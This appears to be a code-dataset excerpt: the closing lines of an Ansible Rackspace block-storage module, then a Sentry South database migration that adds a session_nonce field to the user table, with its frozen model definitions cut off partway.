cloud_block_storage(module, state, name, description, meta, size,
snapshot_id, volume_type, wait, wait_timeout,
image)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
# invoke the module
if __name__ == '__main__':
main()
| gpl-3.0 |
looker/sentry | src/sentry/south_migrations/0276_auto__add_field_user_session_nonce.py | 4 | 87423 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'User.session_nonce'
db.add_column(
'auth_user',
'session_nonce',
self.gf('django.db.models.fields.CharField')(max_length=12, null=True),
keep_default=False
)
def backwards(self, orm):
# Deleting field 'User.session_nonce'
db.delete_column('auth_user', 'session_nonce')
models = {
'sentry.activity': {
'Meta': {
'object_name': 'Activity'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True'
}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.apikey': {
'Meta': {
'object_name': 'ApiKey'
},
'allowed_origins':
('django.db.models.fields.TextField', [], {
'null': 'True',
'blank': 'True'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32'
}),
'label': (
'django.db.models.fields.CharField', [], {
'default': "'Default'",
'max_length': '64',
'blank': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Organization']"
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.apitoken': {
'Meta': {
'object_name': 'ApiToken'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True'
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'token':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.auditlogentry': {
'Meta': {
'object_name': 'AuditLogEntry'
},
'actor': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_actors'",
'null': 'True',
'to': "orm['sentry.User']"
}
),
'actor_key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True',
'blank': 'True'
}
),
'actor_label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'target_object':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'target_user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_targets'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.authenticator': {
'Meta': {
'unique_together': "(('user', 'type'),)",
'object_name': 'Authenticator',
'db_table': "'auth_authenticator'"
},
'config': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {}),
'created_at':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authidentity': {
'Meta': {
'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))",
'object_name': 'AuthIdentity'
},
'auth_provider': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.AuthProvider']"
}
),
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'last_synced':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_verified':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authprovider': {
'Meta': {
'object_name': 'AuthProvider'
},
'config': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_global_access':
('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'default_role':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50'
}),
'default_teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']",
'unique': 'True'
}
),
'provider': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'sync_time':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
})
},
'sentry.broadcast': {
'Meta': {
'object_name': 'Broadcast'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_expires': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime(2016, 11, 9, 0, 0)',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active':
('django.db.models.fields.BooleanField', [], {
'default': 'True',
'db_index': 'True'
}),
'link': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.CharField', [], {
'max_length': '256'
}),
'title': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'upstream_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'blank': 'True'
}
)
},
'sentry.broadcastseen': {
'Meta': {
'unique_together': "(('broadcast', 'user'),)",
'object_name': 'BroadcastSeen'
},
'broadcast': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Broadcast']"
}
),
'date_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.commit': {
'Meta': {
'unique_together': "(('repository_id', 'key'),)",
'object_name': 'Commit',
'index_together': "(('repository_id', 'date_added'),)"
},
'author': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.CommitAuthor']",
'null': 'True'
}
),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'message': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'repository_id':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {
'unique_together': "(('organization_id', 'email'),)",
'object_name': 'CommitAuthor'
},
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.counter': {
'Meta': {
'object_name': 'Counter',
'db_table': "'sentry_projectcounter'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'unique': 'True'
}
),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dsymbundle': {
'Meta': {
'object_name': 'DSymBundle'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'sdk': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymSDK']"
}
)
},
'sentry.dsymobject': {
'Meta': {
'object_name': 'DSymObject'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_path': ('django.db.models.fields.TextField', [], {
'db_index': 'True'
}),
'uuid':
('django.db.models.fields.CharField', [], {
'max_length': '36',
'db_index': 'True'
}),
'vmaddr':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'vmsize':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
})
},
'sentry.dsymsdk': {
'Meta': {
'object_name':
'DSymSDK',
'index_together':
"[('version_major', 'version_minor', 'version_patchlevel', 'version_build')]"
},
'dsym_type':
('django.db.models.fields.CharField', [], {
'max_length': '20',
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'sdk_name': ('django.db.models.fields.CharField', [], {
'max_length': '20'
}),
'version_build': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'version_major': ('django.db.models.fields.IntegerField', [], {}),
'version_minor': ('django.db.models.fields.IntegerField', [], {}),
'version_patchlevel': ('django.db.models.fields.IntegerField', [], {})
},
'sentry.dsymsymbol': {
'Meta': {
'unique_together': "[('object', 'address')]",
'object_name': 'DSymSymbol'
},
'address':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'symbol': ('django.db.models.fields.TextField', [], {})
},
'sentry.environment': {
'Meta': {
'unique_together': "(('project_id', 'name'),)",
'object_name': 'Environment'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.event': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'Event',
'db_table': "'sentry_message'",
'index_together': "(('group_id', 'datetime'),)"
},
'data':
('sentry.db.models.fields.node.NodeField', [], {
'null': 'True',
'blank': 'True'
}),
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'event_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'db_column': "'message_id'"
}
),
'group_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'time_spent':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'null': 'True'
})
},
'sentry.eventmapping': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'EventMapping'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventtag': {
'Meta': {
'unique_together':
"(('event_id', 'key_id', 'value_id'),)",
'object_name':
'EventTag',
'index_together':
"(('project_id', 'key_id', 'value_id'), ('group_id', 'key_id', 'value_id'))"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {
'unique_together':
"(('project', 'ident'), ('project', 'hash'))",
'object_name':
'EventUser',
'index_together':
"(('project', 'email'), ('project', 'username'), ('project', 'ip_address'))"
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'username':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
})
},
'sentry.file': {
'Meta': {
'object_name': 'File'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'legacy_blob'",
'null': 'True',
'to': "orm['sentry.FileBlob']"
}
),
'blobs': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.FileBlob']",
'through': "orm['sentry.FileBlobIndex']",
'symmetrical': 'False'
}
),
'checksum':
('django.db.models.fields.CharField', [], {
'max_length': '40',
'null': 'True'
}),
'headers': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'type': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.fileblob': {
'Meta': {
'object_name': 'FileBlob'
},
'checksum':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
)
},
'sentry.fileblobindex': {
'Meta': {
'unique_together': "(('file', 'blob', 'offset'),)",
'object_name': 'FileBlobIndex'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.FileBlob']"
}
),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.globaldsymfile': {
'Meta': {
'object_name': 'GlobalDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'uuid':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '36'
})
},
'sentry.group': {
'Meta': {
'unique_together': "(('project', 'short_id'),)",
'object_name': 'Group',
'db_table': "'sentry_groupedmessage'",
'index_together': "(('project', 'first_release'),)"
},
'active_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'culprit': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'null': 'True',
'db_column': "'view'",
'blank': 'True'
}
),
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']",
'null': 'True',
'on_delete': 'models.PROTECT'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_public': (
'django.db.models.fields.NullBooleanField', [], {
'default': 'False',
'null': 'True',
'blank': 'True'
}
),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'level': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '40',
'db_index': 'True',
'blank': 'True'
}
),
'logger': (
'django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64',
'db_index': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'null': 'True'
}
),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'resolved_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'short_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'time_spent_count':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'time_spent_total':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'times_seen': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '1',
'db_index': 'True'
}
)
},
'sentry.groupassignee': {
'Meta': {
'object_name': 'GroupAssignee',
'db_table': "'sentry_groupasignee'"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'unique': 'True',
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_assignee_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupbookmark': {
'Meta': {
'unique_together': "(('project', 'user', 'group'),)",
'object_name': 'GroupBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_bookmark_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupemailthread': {
'Meta': {
'unique_together': "(('email', 'group'), ('email', 'msgid'))",
'object_name': 'GroupEmailThread'
},
'date': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'msgid': ('django.db.models.fields.CharField', [], {
'max_length': '100'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Project']"
}
)
},
'sentry.grouphash': {
'Meta': {
'unique_together': "(('project', 'hash'),)",
'object_name': 'GroupHash'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
)
},
'sentry.groupmeta': {
'Meta': {
'unique_together': "(('group', 'key'),)",
'object_name': 'GroupMeta'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {
'object_name': 'GroupRedirect'
},
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'previous_group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'unique': 'True'
})
},
'sentry.grouprelease': {
'Meta': {
'unique_together': "(('group_id', 'release_id', 'environment'),)",
'object_name': 'GroupRelease'
},
'environment':
('django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64'
}),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.groupresolution': {
'Meta': {
'object_name': 'GroupResolution'
},
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouprulestatus': {
'Meta': {
'unique_together': "(('rule', 'group'),)",
'object_name': 'GroupRuleStatus'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_active': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'rule': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Rule']"
}
),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
})
},
'sentry.groupseen': {
'Meta': {
'unique_together': "(('user', 'group'),)",
'object_name': 'GroupSeen'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'db_index': 'False'
}
)
},
'sentry.groupsnooze': {
'Meta': {
'object_name': 'GroupSnooze'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'until': ('django.db.models.fields.DateTimeField', [], {})
},
'sentry.groupsubscription': {
'Meta': {
'unique_together': "(('group', 'user'),)",
'object_name': 'GroupSubscription'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Project']"
}
),
'reason':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.grouptagkey': {
'Meta': {
'unique_together': "(('project', 'group', 'key'),)",
'object_name': 'GroupTagKey'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
